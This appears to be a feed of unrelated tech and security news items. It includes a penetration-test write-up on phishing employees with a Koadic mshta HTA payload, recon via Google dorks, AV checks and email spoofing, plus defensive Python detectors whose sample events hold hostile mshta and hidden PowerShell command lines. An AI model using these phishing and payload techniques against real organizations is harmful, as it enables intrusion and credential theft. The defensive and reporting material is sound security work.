Some of the best phones on the market come with all sorts of quirks. Did you know that Google provides its phones like the Pixel 7 Pro with a free VPN service in some regions? And it’s such a good thing that it does, because curiosity has led all of us to questionable destinations at a point.
But one of the cooler things about VPNs, beyond the extra layer of security and anonymity, is that you can also use it to get access to things that others don’t want you to see. Like region-exclusive Netflix shows or entirely new apps and games.
Such as the recently launched Twitter Threads, which has been blowing up in the last week or so. Well, outside of the EU at least, because these “law” things aren’t letting Europeans hop on the latest theands (no I’m not sorry for that one). Yes, even with a VPN on: it won’t work.
And this is how Threads looks, for all of the EU residents.
Because, of course, a lot of online users already tried a VPN service to get over the barrier. Why would they do that? Well, simple really, it is because:
The platform is still fresh, so getting tons of new followers is very, very easy. And that is important, because those carry over to Instagram too, which ultimately means that you may get quick access to a boost in popularity.
Threads is doing something genius with its marketing: upon signing up to the platform, you get assigned a sequential number. And this being the internet and all, people turned “having a cool number” into a fashion statement.
And if that last statement doesn’t send dystopian chills down your spine, I don’t know what will.
Meta, however, is “dedicated to following EU regulations”. The app is smart enough to check more than your signal’s geolocation, so it can prevent you from logging in and taking part in the fun. Some users have managed to log in, but they were not allowed to do anything, so let’s hope that at least they got a cool number assigned for all of their troubles.
The situation really isn’t that complicated: your Meta account connects your Threads account with your Facebook and Instagram accounts. If you’ve had previous activity on there, Meta is probably aware of your estimated (or precise) location.
In other words, you suddenly popping up in LA after spending years in Italy probably isn’t legit.
Even if Meta says it’s dedicated to the idea of bringing Threads over to the EU, let’s not forget that the goal is to harvest more of that tasty user data. But as long as the EU keeps penalizing such nefarious plots through hefty fines, you might be wiser to not hold your breath for Threads.
Researchers found the popular chat service QuickBlox exhibiting numerous security flaws. Exploiting the QuickBlox framework vulnerabilities could allow an adversary to access the users’ data from the apps’ databases. QuickBlox patched the flaw with the latest firmware release, urging users to update their systems at the earliest.
QuickBlox Framework Vulnerabilities Risked Users’ Data
According to a recent report from Check Point Research, their researchers and the Claroty Team82 team discovered numerous vulnerabilities in the QuickBlox framework.
QuickBlox is a dedicated chat and video communication service used in IoT, telemedicine, finance, and other such mobile apps. The service boasts a considerable clientele, serving millions of customers. It also means that any vulnerabilities in the service may risk the security of millions of users.
That’s what the researchers highlighted in their post. Specifically, they noticed secret tokens and passwords stored within the app and insecure QuickBlox API design. Exploiting the vulnerabilities could let an adversary perform various malicious actions.
For instance, the researchers analyzed an Israeli-based intercom app Rozcom. They then exploited the QuickBlox framework vulnerabilities to take over the target intercom devices, access cameras and microphones, wiretap the devices’ feed, and manage door openings.
Likewise, they analyzed a popular telemedicine service, which already had some vulnerabilities. Consequently, combining the app’s issues with QuickBlox flaws allowed the researchers to access the app’s user database, including patients’ personal data, medical history, chat history with the doctors, and medical records. Besides, the flaws also allowed impersonating doctors and chatting with patients in real time without raising alarms.
In their post, the researchers have also shared the proof-of-concept exploits against the apps running QuickBlox API and SDK.
QuickBlox Patched The Flaws
Upon discovering the vulnerabilities, the researchers reported the matter to QuickBlox officials who promptly patched the flaws. Check Point Research confirmed in its post that the vendors have designed a new API and a new secure architecture for the service.
Hence now, all service providers using the QuickBlox framework must update their apps with the latest QuickBlox release immediately to receive the patches.
YouTube Music introduced podcasts to its platform in April, initially limited to US listeners. However, the company is now rolling out this feature to more countries, allowing a broader audience to enjoy their favorite podcasts through the platform.
According to 9to5Google, the popular streaming platform has extended its podcast feature to listeners in Brazil and Canada. While there has been no official announcement yet, YouTube Music had previously stated that it planned to expand the podcast support to other countries shortly after its introduction in the US.
With the podcast feature, YouTube Music allows users to easily find and listen to podcasts by searching for specific shows or exploring various categories. The platform also offers personalized recommendations based on individual listening history, making it simple to discover new podcast content.
The podcasts feature now comes with a redesigned user experience that includes podcasts as part of the mood filters on the Home page. Alongside the other five mood filters, such as Keep listening and Recommend episodes, the “Podcasts” option will appear. Upon selection, users will be presented with a dedicated feed featuring categories like Gaming, True Crime, Society & Culture, Comedy, etc.
In the Library tab, podcasts now join the filter for Playlists, Songs, Albums, and Artists. Users can create an Auto playlist for “New Episodes” from their subscribed shows and access a collection of previously saved episodes for later listening. Subscribed podcasts will be conveniently organized within the Library alongside other music content.
The Now Playing screen offers several useful features, including a 10-second rewind and 30-second forward option, playback speed adjustment, sleep timer, and access to show details.
Notably, offline and background playback is available to all users, regardless of whether they have a YouTube Premium subscription. However, it is important to note that only podcasts or channels that have uploaded video versions of episodes will be accessible within the YouTube Music platform.
Black-box penetration testing approaches the organization from an external point of view and tests its external network with zero prior information.
The objective was simple – see how susceptible the organization is from an external point of view and test the effectiveness of the security controls that are managed enterprise-wide.
As such, aside from the company name, we were given “ZERO” information to perform the external black-box penetration test.
This black-box external penetration test was performed for a client we will call Hackme.
OSINT 101
We kicked off with some Open Source Intelligence (OSINT) 101 :).
Using quite a few open-source intelligence tools, we obtained publicly available documents relating to the organization using Black-box Penetration Testing methods.
With Google Dork to the rescue, we ran some basic search strings: “site:*.hackme.com ext:xls OR ext:docx OR ext:pptx”.
Of course, our aim was not to tirelessly search for documents.
Rather, our objective was to understand the organization’s naming schema by examining the metadata of the documents, which is found in the “properties section” of the document (most especially Microsoft Word, PowerPoint, and Excel). One can also use FOCA for this.
From this, I noticed that employees’ emails followed a particular naming convention – the first letter of the first name + surname @ domain.com (so a John Doe would be jdoe@domain.com).
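The naming-convention leak described above comes straight from the author and lastModifiedBy fields that Office files carry in docProps/core.xml. The following added example (not part of the original write-up, and not FOCA) shows the defensive counterpart: an audit that a document owner can run over files before they are published, flagging any core property that looks like a personal name or e-mail address. The sample .docx is constructed in memory, and the hackme.example address and names in it are made up.

```python
import io
import re
import zipfile
from xml.etree import ElementTree as ET

# XML namespaces used by docProps/core.xml in Office Open XML packages (docx, xlsx, pptx).
NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
}

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")


def extract_core_properties(data: bytes) -> dict:
    """Return the creator / lastModifiedBy properties of an OOXML package as a dict."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        if "docProps/core.xml" not in zf.namelist():
            return {}
        root = ET.fromstring(zf.read("docProps/core.xml"))
    props = {}
    for key, path in (("creator", "dc:creator"), ("lastModifiedBy", "cp:lastModifiedBy")):
        el = root.find(path, NS)
        if el is not None and el.text and el.text.strip():
            props[key] = el.text.strip()
    return props


def leaks_identity(props: dict) -> bool:
    """Heuristic: a value is an identity leak if it contains an e-mail address
    or reads like a personal name (two or more capitalised words)."""
    for value in props.values():
        if EMAIL_RE.search(value):
            return True
        words = value.split()
        if len(words) >= 2 and all(w[:1].isupper() for w in words):
            return True
    return False


def build_sample_docx(creator: str, last_modified_by: str) -> bytes:
    """Construct a minimal OOXML package in memory (sample data, not a real document)."""
    core = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<cp:coreProperties xmlns:cp="%s" xmlns:dc="%s">'
        "<dc:creator>%s</dc:creator><cp:lastModifiedBy>%s</cp:lastModifiedBy>"
        "</cp:coreProperties>" % (NS["cp"], NS["dc"], creator, last_modified_by)
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("docProps/core.xml", core)
    return buf.getvalue()


def audit(data: bytes) -> tuple:
    """Return (properties, leaks) for one package; leaks is True when publishing it would expose a person."""
    props = extract_core_properties(data)
    return props, leaks_identity(props)


if __name__ == "__main__":
    # A document saved by an employee, and the same document after its properties were scrubbed.
    raw = build_sample_docx("Jane Doe", "jdoe@hackme.example")
    scrubbed = build_sample_docx("hackme", "")
    print(audit(raw))       # ({'creator': 'Jane Doe', 'lastModifiedBy': 'jdoe@hackme.example'}, True)
    print(audit(scrubbed))  # ({'creator': 'hackme'}, False)
```

The heuristic in `leaks_identity` is deliberately loose; a multi-word department name such as “Corporate Communications” will also be flagged, which is the right failure direction for a pre-publication check.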
Armed with this knowledge, we forked out from LinkedIn the list of all current employees of Hackme using the following google dork syntax:
site:linkedin.com -inurl:dir “at Hackme” “Current”. A typical example is shown below using Google Inc as a reference company.
By hacking together a script to automate the process, we copied out the first names, last names, and the roles of the current employees of Hackme.
A tiring approach is to manually crawl through the Google pages in search of these names and roles, or one could also use GoogleScraper:
Again, I leave the possibilities to your imagination – but you can easily convert this to a .csv file using https://json-csv.com/ or any other converter that works for you.
Then, using your favorite word processor (Word merge, Notepad++, etc.) or some good scripting skills, merge the first name + last name to form your email list.
Feed our Target list a Payload
Since we are simulating Black-box Penetration Testing, we decided (just like what an attacker would do) to gain code execution using malicious payloads.
As such, we thought of creating a payload and sending it via email to employees of Hackme.
We also know that it is a common practice for some file types/extensions to be blocked by the organization’s email filters – to limit exposure to risk.
What made Koadic really stand out, aside from the beautiful interface, is that it allows one to dump hashes, download/upload files, execute commands, bypass UAC, scan the local network for open SMB, pivot to another machine, load mimikatz, and a lot more.
So we ran Koadic and set the necessary variables – using the “stager/js/mshta” module (serves payloads in memory using MSHTA.exe HTML Applications).
The result was a spawn of our HTA payload URL as evidenced in the screenshot above.
However, we need our targets to execute our payload as “mshta payload_url“.
In recent years, HTA payloads have been used as a web attack vector and also, to drop malware on a victim’s PC.
Now we need to get this payload past our victim’s numerous defenses.
Here comes the tricky part – we needed a way to have the victim run “mshta payload_url” without our payload being spawned as a child process of mshta.exe – as we suspect this organization’s blue team may flag this.
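The blue-team concern raised above is a concrete detection opportunity. The following added example (written for this page, not taken from the engagement or from Koadic) is the kind of process-creation rule a defender would run over endpoint telemetry: it parses a handful of constructed Sysmon-style process events and flags an Office application spawning a script host, mshta.exe being handed a remote URL, and mshta.exe itself spawning a shell. The event format, file paths and the 203.0.113.5 address are all made up for the sample.

```python
import re

# Constructed sample process-creation events in a simplified Sysmon Event ID 1 layout
# (key=value fields separated by '|'); paths and the URL are placeholders.
SAMPLE_EVENTS = [
    "ParentImage=C:\\Program Files\\Microsoft Office\\WINWORD.EXE"
    "|Image=C:\\Windows\\System32\\mshta.exe"
    "|CommandLine=mshta http://203.0.113.5/lunch_menu.hta",
    "ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\mshta.exe"
    "|CommandLine=mshta C:\\Users\\alice\\Downloads\\menu.hta",
    "ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\notepad.exe"
    "|CommandLine=notepad.exe readme.txt",
    "ParentImage=C:\\Windows\\System32\\mshta.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell -nop -w hidden",
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}
SHELLS = {"powershell.exe", "cmd.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def parse_event(line: str) -> dict:
    """Split one key=value event into lower-cased image basenames plus the raw command line."""
    fields = dict(part.split("=", 1) for part in line.split("|"))

    def basename(path: str) -> str:
        return path.rsplit("\\", 1)[-1].lower()

    return {
        "parent": basename(fields["ParentImage"]),
        "image": basename(fields["Image"]),
        "cmd": fields["CommandLine"],
    }


def classify(event: dict) -> list:
    """Return the detection names that fire for one parsed event (empty list = benign)."""
    findings = []
    if event["parent"] in OFFICE_PARENTS and event["image"] in SCRIPT_HOSTS:
        findings.append("office app spawned script host")
    if event["image"] == "mshta.exe" and URL_RE.search(event["cmd"]):
        findings.append("mshta launched with remote URL")
    if event["parent"] == "mshta.exe" and event["image"] in SHELLS:
        findings.append("mshta spawned a shell")
    return findings


def scan(lines: list) -> list:
    """Return (event index, findings) for every event that triggers at least one rule."""
    results = []
    for i, line in enumerate(lines):
        findings = classify(parse_event(line))
        if findings:
            results.append((i, findings))
    return results


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

Event 1 (mshta opening a local .hta from Explorer) is left alone on purpose: it is common enough in some environments that a rule firing on every mshta launch would drown the analyst, so the rules key on the parent process and on a remote URL instead.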
Thankfully, we saw the tip on the left from Matt Nelson and interestingly, the team at NCC group has this implemented in Demiguise.
So here is our final payload saved as a .hta file.
The next step typically is to send our .hta payload as an embedded OLE object.
The intended attack scenario was:
Send a Microsoft Word document with our .hta payload embedded as an OLE object.
Get the user to open the Word document and the embedded OLE object.
This spawns a new process and we get shell access to our victim’s PC.
Now we get to the interesting part, we need our victim to open the Microsoft Word document and our payload.
To do this, we need a very compelling story – just because users are getting smarter. So we headed back to doing more recon.
…and more recon
We need to know more about Hackme – specifically the culture and employees’ behavior.
The question we kept asking ourselves was “what would interest the employees?”
Where else to get this information than Glassdoor, a platform that gives you an inside scoop on companies with employee reviews about salaries, benefits, and pros and cons of working with the company?
After poring through reviews of Hackme on Glassdoor, we found some common themes:
Some employees felt mobility was a challenge as the office is quite a long distance from residential locations.
Employees love the organization because they get free lunches.
But Wait!
As the old saying goes, the fastest way to a man’s heart is through his stomach.
So what better way to get the employees to open our payload-embedded Word document?
Send them an email – telling them there is a change in the FREE LUNCH menu starting tomorrow.
Rather than send a random phishing email to employees that could be spotted easily, we decided a seemingly genuine email would be ideal complete with a Hackme email signature while observing the organization’s email culture.
Now, how do we make our email more believable? By sending an email to the Customer Service/Help Desk with a service request and observing the email signature in the response.
… recon again???
We headed back to Linkedin, to look for the name of either the HR Manager, Logistic Manager, or Admin Manager (whichever is appropriate) of Hackme. We carefully crafted an email signature with the name we selected.
We are halfway through sending our payload now. Have some patience and read on…
It’s time to send our payload
From the metadata recon done earlier, we could tell what our target organization’s document headers and footers looked like.
I then created a new Word document like the one shown below, a spitting image of the Hackme document template with appropriate headers/footers.
Then we embedded our .hta as an OLE object. Microsoft Word Document >> Insert >> Object >> Package.
We changed the icon to a Microsoft Word icon and also the caption to reflect our message.
Don’t Forget the Anti-virus!!!
To check the AV detection rate of our payload – and to see if it would be flagged as malicious by Hackme’s antivirus solution (if any) – we did a quick AV scan on nodistribute.com. Nodistribute.com was used because, according to them, they don’t distribute payload samples to AV companies. We scanned both the maldoc and the .hta file.
AV Scan of our .hta payload (0 detections)
It’s Time to Send our Email
If the target org does not have SPF, DKIM, and DMARC configured, one can easily spoof the HR Manager, Logistic Manager, or Admin Manager’s email address.
In this case, I created a Gmail account (yes, Gmail works too) using the Logistic Manager’s first name and last name – and then spiced it up with his signature, which was obtained earlier.
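The sentence about SPF, DKIM and DMARC is the one configuration point in this write-up that the receiving organization controls, so here is an added example (mine, not the author’s) of the check a mail administrator can run on their own domain. It takes the TXT records you would fetch with `dig TXT yourdomain` and `dig TXT _dmarc.yourdomain`, parses them, and reports the settings that leave display-name or envelope spoofing easy: a missing or soft-fail SPF `all` mechanism and a DMARC policy of `none` or `quarantine`. DKIM is not evaluated because checking it needs the selector names in use. The two record pairs at the bottom are constructed for hackme.example and are not real DNS data.

```python
def parse_spf(record: str):
    """Return the qualifier of the SPF 'all' mechanism ('+', '-', '~' or '?'),
    or None when the record is not SPF or has no 'all' term."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return None
    for term in terms[1:]:
        t = term.lower()
        if t.lstrip("+-~?") == "all":
            return t[0] if t[0] in "+-~?" else "+"   # bare 'all' means '+all'
    return None


def parse_dmarc(record: str) -> dict:
    """Return DMARC tags as a lower-cased dict, or {} when the record is not DMARC."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.strip().split("=", 1)
            tags[key.strip().lower()] = value.strip().lower()
    return tags if tags.get("v") == "dmarc1" else {}


def assess_spoofability(spf_record, dmarc_record) -> list:
    """List the weaknesses that make mail claiming to be from this domain easy to spoof.
    Pass None for a record that does not exist in DNS."""
    issues = []
    if spf_record is None:
        issues.append("no SPF record")
    else:
        qual = parse_spf(spf_record)
        if qual is None or qual == "+":
            issues.append("SPF has no restrictive 'all' mechanism")
        elif qual == "?":
            issues.append("SPF ends with ?all (neutral): no verdict for unlisted senders")
        elif qual == "~":
            issues.append("SPF ends with ~all (softfail): receivers may still deliver")

    dmarc = parse_dmarc(dmarc_record) if dmarc_record is not None else {}
    if not dmarc:
        issues.append("no DMARC record")
    else:
        policy = dmarc.get("p", "none")
        if policy == "none":
            issues.append("DMARC p=none: spoofed mail is only reported, not rejected")
        elif policy == "quarantine":
            issues.append("DMARC p=quarantine: spoofed mail lands in spam rather than being rejected")
        if dmarc.get("pct", "100") != "100":
            issues.append("DMARC pct=%s: policy applied to only part of the traffic" % dmarc["pct"])
    return issues


# Constructed records for a hypothetical hackme.example domain: a weak setup and the hardened one.
WEAK = (
    "v=spf1 include:_spf.mailprovider.example ~all",
    "v=DMARC1; p=none; rua=mailto:dmarc@hackme.example",
)
STRONG = (
    "v=spf1 include:_spf.mailprovider.example -all",
    "v=DMARC1; p=reject; pct=100; rua=mailto:dmarc@hackme.example",
)

if __name__ == "__main__":
    for label, records in (("weak", WEAK), ("strong", STRONG), ("absent", (None, None))):
        print(label, assess_spoofability(*records) or ["no obvious spoofing weaknesses"])
```

A domain that comes back clean here still has to publish DKIM and, for the scenario in the write-up, remember that a look-alike Gmail address is not covered by any of these records; that case is a people-and-process control, not a DNS one.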
Let the shells in
Shortly after sending the email, within a period of about 3 minutes, we had at least 30 shell connections! W00t!!!
What next?
The rest, as they often say, is history. From here on, using the mimikatz modules, we escalated privileges, dumped hashes, scanned the local network of Hackme, pivoted into other PCs, browsed the target’s file systems, and even became domain admins.
In conclusion
All in all, this was a very fun engagement. Whilst it may take an attacker a month, two months, or a year of dedication to break into an organization through a loophole at the infrastructure level, it can be fairly easy to gain access by exploiting the human factor.
“Once you understand your target environment, devising a creative means in gaining access to the environment becomes fairly easy”.
The moral of the exercise is: Recon, recon, and more recon – for a wise man once said
“Give me six hours to chop down a tree and I will spend the first four sharpening the axe“.
Credits:
Rotimi Akinyele – Rotimi is an experienced Cybersecurity, IT Governance, Risk, and Compliance (GRC) professional. He is an Assistant Manager, Cybersecurity at BDO UAE.
The app under discussion, Swing VPN – Fast VPN Proxy, was uncovered as a DDoS botnet by a cybersecurity researcher named “Lecromee” on June 4th, 2023.
On June 4th, 2023, cybersecurity researcher “Lecromee” uncovered alarming information about the popular VPN app, Swing VPN – Fast VPN Proxy. Developed by Limestone Software Solutions for Android and iOS platforms, Swing VPN’s Android version was found to be operating as a dangerous DDoS botnet, posing significant risks to its unsuspecting users.
Hackread.com first reported on the issue on June 21, 2023, after Lecromee’s investigation raised serious concerns. The findings indicated that the app, which claimed to offer legitimate VPN services, was harbouring malicious intent and could carry out distributed denial of service (DDoS) attacks.
Shortly after the report was published, Hackread.com was contacted by Google on June 22, confirming the veracity of the claims. In response to the alarming discovery, Google took immediate action and swiftly removed Swing VPN’s Android app with over 5 million installs from the Google Play Store.
It is worth noting that another app from Limestone Software Solutions, called Hotspot for Swing VPN, has also been removed from the app store along with Swing VPN – Fast VPN Proxy.
A Google spokesperson emphasized the company’s commitment to user safety and security, stating,
“The app was removed from Google Play on June 22, and the developer has been banned. Users are also protected by Google Play Protect, which warns users of apps known to exhibit malicious behaviour on Android devices with Google Play Services, even when those apps come from other sources.”
Google
The removal of Swing VPN – Fast VPN Proxy app from the official app store highlights the ongoing challenges faced by platforms like Google Play in combating malicious apps. Unfortunately, such occurrences are not uncommon, and Google continuously works to enhance its security measures to protect users.
However, users themselves must remain vigilant and cautious about the apps they download and grant permission to. Cybersecurity experts recommend the following best practices to stay safe:
Research Before Download: Always research the app and its developer before downloading it. Check user reviews, ratings, and previous security incidents, if any.
Update Regularly: Keep all apps, including VPNs, up-to-date with the latest versions and security patches to minimize vulnerabilities.
Verify Permissions: Be cautious about granting excessive permissions to apps. Review and understand the permissions an app requests before installation.
Use Reputable Sources: Stick to trusted app stores like Google Play and Apple’s App Store to minimize the risk of downloading malicious apps.
Antivirus Software: Install reputable antivirus software on your device to detect and block potential threats.
As the digital landscape continues to evolve, staying informed and vigilant against cyber threats is crucial. The Swing VPN incident serves as a reminder that even seemingly legitimate apps can harbour dangerous intentions, making it essential for users to prioritize their online safety.
If you suspect any app or service is engaging in malicious behaviour, report it to the respective app store or platform immediately. By working together, users, researchers, and tech companies can create a safer digital environment for everyone.
If you are an Android user, you can follow this link to report an app or an app developer. For iOS users, this link can be helpful.
The apparent successful sale took place despite the FBI’s takedown and seizure of the clearnet domain and infrastructure of Genesis Market in April 2023.
The criminal group responsible for Genesis Market, a prominent Dark Web platform known for facilitating cyber fraud, announced that the platform has been sold to an anonymous buyer.
The sale comes several months after U.S. authorities disrupted the platform, seizing some of its domains and adding it to the sanctions list. The move raises concerns about the potential revival of illicit activities and the evolving nature of cybercrime.
As we previously reported, in late June, Genesis Market was advertised to be available for sale on a hacker forum along with its source code and database. The operators’ attempt to sell the marketplace was met with suspicion in the cybersecurity community with researchers speculating that the advertisements were likely part of an FBI honeypot operation.
The news of Genesis Market’s sale emerged when an account named GenesisStore, which had previously associated itself with the platform’s administrators, posted an announcement on the Russian-language Exploit Forum.
According to The Record’s report, the post stated that a buyer had been found, and a deposit had been made, with the store set to be transferred to the new owner next month. Notably, the sale does not include current user accounts.
Earlier this year, the FBI-led operation successfully seized Genesis Market‘s clear web domains and made several arrests of individuals globally who had been involved in fraudulent activities through the platform.
The operation also led to the identification and location of the platform’s backend servers, resulting in the acquisition of valuable information about approximately 59,000 user accounts.
The sale of Genesis Market, despite its tarnished reputation, has raised eyebrows within the cybersecurity community. Some experts speculate that the operators themselves orchestrated the sale to facilitate rebranding and disconnect from the sanctioned entity. Doubts have been cast on the viability of the sale, given the platform’s diminished standing and the legal consequences that potential buyers might face.
The seized clearnet domain of the Genesis Market (Image: Hackread.com)
Law enforcement agencies worldwide are likely to closely monitor the developments surrounding the sale of Genesis Market, ensuring that any potential resurgence of criminal activities is promptly addressed, which is another disadvantage the new buyer of the marketplace will have to face.
Nevertheless, the cybersecurity community remains vigilant in combating cybercrime and safeguarding the digital landscape, and it is unlikely to let a defunct marketplace rise back to power.
Threads, the Twitter rival from Meta’s Instagram that appeared out of nowhere to wind up with 100 million subscribers after its first five days, is moving faster than expected to add a feature found on Twitter. Originally, Instagram CEO Adam Mosseri said that Direct Messaging for Threads would not be coming soon. Direct Messaging, or DMs, are messages sent privately from one subscriber to another subscriber on the same platform.
Now it appears that Threads might be offering DMs sooner than expected. Business Insider has obtained a leaked internal memo from Instagram saying that DMs would be “coming soon” to Threads along with some other features. While the report was blocked by a paywall, social media analyst Matt Navarra posted on Twitter (ironically) that the memo does mention new capabilities that are heading to Threads.
This is actually good news for Threads since adding DMs means that anyone on the platform who wants to speak with another subscriber privately will be able to do so without leaving Threads and heading to another social media app. What made Threads decide to move up the timeline for DMs? There is speculation that important Threads creators got the ear of Instagram executives and stressed the importance of launching it for the platform ahead of other features.
Social media analyst Navarra says DMs are coming soon to Threads along with other features
Instagram CEO Mosseri also said that improved search, trends, and topics are also coming soon for Threads. In addition, Threads has promised support for multiple accounts, a feed in chronological order that would show only people you know, support for hashtags, and the ability to edit posts. Subscribers also want the option of deleting their accounts without having to delete their Instagram account. And eventually, once Threads becomes more than just a flash-in-the-pan, you’ll see Instagram look to monetize the platform by selling ads.
Threads is off to a good start putting pressure on Elon Musk and his team to attract more advertisers and turn Twitter cash flow positive. As for Threads, we don’t know when DMs and all of the other aforementioned features will come to the site but for those who are backing it, these additions can’t come soon enough. And it seems that Instagram’s Mosseri is smart enough to understand that he can turn the heat up on Twitter by launching these features earlier than expected.
Google Play Protect scans apps in the Play Store before you install them to make sure the apps you’re adding to your phone are free of any malware. It also scans your phone to make sure that apps you sideloaded (installed from a third-party app storefront) didn’t infect your Android handset. However, there are other ways besides offering malware-laden apps to steal your personal data.
Two Play Store apps with 1.5 million installs lied about not collecting user data
According to security firm Pradeo (via BleepingComputer), two apps from the Play Store that have been installed more than 1.5 million times collected more user data than needed to allow the apps to do the jobs they were supposed to do. The two apps came from the same developer, wang tom. One of the titles is “File Recovery and Data Recovery,” which shows up as “com.spot.music.filedate” on devices and was installed at least 1 million times. The other app, installed at least 500,000 times, is titled “File Manager” and shows up on devices as “com.file.box.master.gkd.”
These two apps, with a total of over 1.5 million Play Store installs, stole user data
The two apps were discovered by Pradeo and their listings in the Play Store say that they do not collect any user data, which was an out-and-out lie. The apps also violated the EU’s General Data Protection Regulation (GDPR) by stating that any personal data collected by the app could not be deleted. The security firm found that personal data was stolen by the apps and sent to China. The data stolen includes:
Users’ contact lists from the device itself and from all connected accounts such as email, social networks.
Media compiled in the application: Pictures, audio and video contents.
Real time user location.
Mobile country code.
Network provider name.
Network code of the SIM provider.
Operating system version number, which can be used to target vulnerabilities known to affect that version, as the Pegasus spyware did.
To make sure that the malicious apps were launched, the extra permissions that the apps received allowed them to force a device to restart. When the phone restarted, the apps launched and were able to do their malicious tasks even without user interaction. Both apps also hid their icons from the home screen making them almost impossible to delete from an infected device.
In a statement, Google confirmed that the two apps have been deleted from the Play Store and said, “These apps have been removed from Google Play. Google Play Protect protects users from apps known to contain this malware on Android devices with Google Play Services, even when those apps come from other sources outside of Play.” Even though Google did remove the apps from the Play Store, if they are still on your device they can still cause trouble. Delete them immediately!
Security firm Pradeo lists some recommendations
Pradeo did make some recommendations, some of which we have discussed with you before:
Do not download applications that have no reviews despite having thousands of users.
Read reviews when there are any, they usually reflect the application’s true nature.
Always carefully read permissions before accepting them.
Here are some more tips that we’ve learned over the years. If running a certain app makes your phone run hot or drains your battery, it’s a good bet that the app is compromised. A rogue app with adware could be playing ads in the background to run up revenue.
The apps lied in the Play Store and also violated GDPR rules about user data
And we really agree with Pradeo’s hint to “Read reviews when there are any, they usually reflect the application’s true nature.” We’ve said that for years. If any red flags pop up in the review of an app, don’t install it, keep going, and never look back. The simple rule is that you should look at the reviews for an app from a developer that you’ve never heard of. And even then, if you’re unsure, Google the name of the app and see what comes up.
The bad news keeps piling on for Twitter owner Elon Musk. His $44 billion investment in Twitter is just not working out yet and Mark Zuckerberg’s Meta is signing up subscribers for newly minted Twitter rival Threads at a rapid pace. Threads has a huge advantage because of Thread’s Instagram integration. New Threads subscribers must have an Instagram account to join; Instagram has over 1 billion monthly active users and a large number of that platform’s subscribers will open a Threads account, a process that is quick and easy to do.
Today, Musk revealed some more bad news in the form of a tweet that said, “We’re still negative cash flow, due to ~50% drop in advertising revenue plus heavy debt load. Need to reach positive cash flow before we have the luxury of anything else.” Negative cash flow means exactly what it sounds like. More cash is leaving the business than is coming into it. On the other hand, he also said yesterday that it “Looks like this platform may see all-time high device user seconds usage this week.”
Twitter owner Elon Musk passes along some bad news
Advertisers might not be happy with the mess that Musk has created at Twitter as he monetized verification checkmarks and kept reversing company policy. He also put a cap on the number of tweets users can read in a day only to raise that cap hours later. It is this kind of instability at Twitter that has advertisers pulling back. Back in April, Musk said that advertisers were coming back and that cash flow would soon turn positive. So far, it hasn’t. At the time, Musk said, “Almost all of them have either come back or said they’re coming back.”
According to app research firm Sensor Tower, during a two-month period earlier this year, Twitter’s advertising revenue plunged by 89% to $7.6 million. Compare that figure to the $71 million that the top ten Twitter advertisers spent on ads from September to October of last year just before Musk’s acquisition of the platform.
The backdoor dropped in the scam had the ability to exfiltrate a wide range of data, including the hostname, username, and a comprehensive list of home directory contents.
Cybersecurity researchers have uncovered a deceptive trend within the security community—a proof of concept (PoC) repository on GitHub that appears to address vulnerabilities but actually contains a hidden backdoor. The discovery by the Uptycs threat research team has raised concerns among the security research community.
PoCs are typically used by researchers to identify potential vulnerabilities through harmless testing. However, this malicious PoC operates as a downloader, disguising its activities as a kernel-level process while silently executing a Linux bash script.
The backdoor has the ability to exfiltrate a wide range of data, including the hostname, username, and a comprehensive list of home directory contents. Moreover, by adding their SSH key to the authorized_keys file, an attacker can achieve full control over a targeted system.
One of the fake profiles on GitHub that was used in spreading malicious PoCs (Image credit: Uptycs)
Here, Hackread.com can exclusively confirm that the image used in the above GitHub profile belongs to Shahriyar Hamid oghlu Mammadyarov, known internationally as Shakhriyar Mamedyarov, who is an Azerbaijani chess grandmaster. The profile image was stolen from a blog post and a YouTube video published by the popular Chess-related YouTube channel, ChessBase India.
The backdoor was discovered during the testing of PoCs for various Common Vulnerabilities and Exposures (CVEs) when the Uptycs team encountered a PoC claiming to address the critical vulnerability CVE-2023-35829. However, they detected several unusual activities that raised suspicions about the PoC’s legitimacy.
The suspicious behaviours encompassed unexpected network connections, abnormal data transfers, and unauthorized attempts to access the system. Further investigation revealed the significance of the “aclocal.m4” file, which required additional analysis.
The primary function of the binary file contains an interesting string, “kworker,” which plays a crucial role in the deception. The code checks if the binary is named “kworker” and performs specific actions accordingly, establishing backdoor persistence through file manipulation.
In their report, Nischay Hegde and Siddartha Malladi of the Uptycs Threat Research team wrote that the PoC used forking to create a new process, obscuring the original command line parameters. The parent process then executes the “curl_func()” function, which downloads a URL containing a bash script. The script is executed if the curl request succeeds.
The fake PoC is a copy of a legitimate exploit for another Linux kernel vulnerability, CVE-2022-34918. It creates the illusion of being a root shell, exploiting differences in user namespaces to deceive users. However, the granted privileges are limited to the “/bin/bash” shell within a specific namespace.
Using Uptycs Extended Detection and Response (XDR), the binary’s behaviour was identified primarily as a downloader. It retrieves a script from a remote source and executes it on the compromised system. The downloaded script accesses the “/etc/passwd” file and modifies the “~/.ssh/authorized_keys” file to grant unauthorized access and exfiltrates data using a specific URL.
This incident is not isolated; just last month, it was reported that several fake accounts on GitHub and Twitter were spreading malware in malicious PoC that infected both Windows- and Linux-based systems.
At the time of writing, ChriSander22’s repositories were taken down. Although the malicious PoC has also been removed from GitHub, it was widely shared, resulting in significant engagement before its true nature was exposed. Those who executed the PoC are at high risk of data compromise.
